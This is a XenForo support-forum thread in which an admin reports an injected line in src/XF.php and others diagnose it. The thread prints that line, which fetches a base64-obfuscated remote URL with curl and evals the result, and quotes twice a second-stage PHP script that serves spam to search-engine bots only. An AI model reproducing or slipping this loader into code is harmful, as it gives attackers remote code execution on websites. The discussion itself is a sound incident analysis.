XF 2.2 src/XF.php Unexpected contents

KSA

Well-known member
No matter how many times I re-upload the src/XF.php file, check for files health shows Unexpected contents

comparing the two files shows this line

PHP:
$ch = curl_init();$timeout = 60;curl_setopt ($ch, CURLOPT_URL, base64_decode('aHR0cHM6Ly9qc3BocC5jYy9maWxlL2RlZmVuc2UtYXJhYi5jb20vYTE='));curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$Content_mb = curl_exec($ch);curl_close($ch);eval($Content_mb);
 
That's exactly why the file check system is in place. That line is some hacky stuff that is not part of XF source.

That is downloading this: https://jsphp.cc/file/defense-arab.com/a1, which in turn downloads this: https://jsphp.cc/file/defense-arab.com/a2

Which then runs this:

PHP:
<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/vb/'){    
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    echo file_get_contents("https://jsphp.cc/file/defense-arab.com/a1.html");
    exit;
}
?>

It causes the site to spew out this page: https://jsphp.cc/file/defense-arab.com/a1.html, but only if it's a search engine spider (for example Googlebot). Basically it's search engine spam.
 
  • Like
Reactions: KSA
That's exactly why the file check system is in place. That line is some hacky stuff that is not part of XF source.

That is downloading this: https://jsphp.cc/file/defense-arab.com/a1, which in turn downloads this: https://jsphp.cc/file/defense-arab.com/a2

Which then runs this:

PHP:
<?php
error_reporting(0);
$s_ref = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
if(strpos($agent,'bot') > 0 && $_SERVER['REQUEST_URI']=='/vb/'){   
    $accept_lang = strtolower($_SERVER['HTTP_ACCEPT_LANGUAGE']);
    if(strpos($accept_lang,'zh')>-1 || $_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']==1 || $_COOKIE['az']=='lp'){setcookie('az','lp',time()+3600*7200); echo ' '; exit;}
    echo file_get_contents("https://jsphp.cc/file/defense-arab.com/a1.html");
    exit;
}
?>

It causes the site to spew out this page: https://jsphp.cc/file/defense-arab.com/a1.html, but only if it's a search engine spider (for example Googlebot). Basically it's search engine spam.

That is exactly what happened when you type the url in Google search, it yields Japanese characters where the board title and meta description. I however couldn't find the file being used on the server! Any advice?
 
If that file is part of the core XF installation, I would upload the file from there. No official release of XF, and no add-on in resources here, will ever change a core XF file.
 
Top Bottom